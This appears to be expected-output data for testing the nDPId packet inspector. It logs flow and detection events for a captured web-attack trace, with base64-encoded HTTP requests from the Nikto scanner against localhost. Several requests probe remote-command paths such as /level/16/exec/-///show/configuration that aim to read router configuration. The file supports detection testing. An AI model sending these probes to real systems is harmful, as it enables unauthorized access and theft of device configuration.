{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277562,"pkt":"AAAAAAAAAAAAAAAACABFAADAFKZAAEAGJ5B\/AAABfwAAAcXqH5AjeyxLwwFcDYAYAED+tAAAAQEICp1m\/mKdZv5iR0VUIC9zbXNzZW5kLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY2KQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277564,"pkt":"AAAAAAAAAAAAAAAACABFAADYoI5AAEAGm49\/AAABfwAAAcXsH5AgHJhkU1YzMYAYAED+zAAAAQEICp1m\/mOdZv5jR0VUIC9wbHMvc2ltcGxlZGFkL2FkbWluXy9kYWRlbnRyaWVzLmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}} +01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277565,"pkt":"AAAAAAAAAAAAAAAACABFAADKFqFAAEAGJYt\/AAABfwAAAcXuH5Ag7S5xgHE61oAYAED+vgAAAQEICp1m\/mWdZv5lR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9wd2QgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1MykNCg0K"} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277566,"pkt":"AAAAAAAAAAAAAAAACABFAADZY3pAAEAG2KJ\/AAABfwAAAcXwH5Bf2FuYp3IH4oAYAED+zQAAAQEICp1m\/madZv5mR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}} +01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277567,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ybtAAEAGcn1\/AAABfwAAAcXyH5BbOPFKogxutoAYAED+sQAAAQEICp1m\/medZv5nR0VUIC9sZXZlbC8xNiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU1KQ0KDQo="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277568,"pkt":"AAAAAAAAAAAAAAAACABFAADDBTJAAEAGNwF\/AAABfwAAAcX0H5Cobz3BWm\/3E4AYAED+twAAAQEICp1m\/midZv5oR0VUIC9sZXZlbC8xNi9leGVjLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277570,"pkt":"AAAAAAAAAAAAAAAACABFAADVrDFAAEAGj+9\/AAABfwAAAcX2H5DQ55TgYEZuMYAYAED+yQAAAQEICp1m\/mqdZv5qR0VUIC9sZXZlbC8xNi9leGVjLy9zaG93L2FjY2Vzcy1saXN0cyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 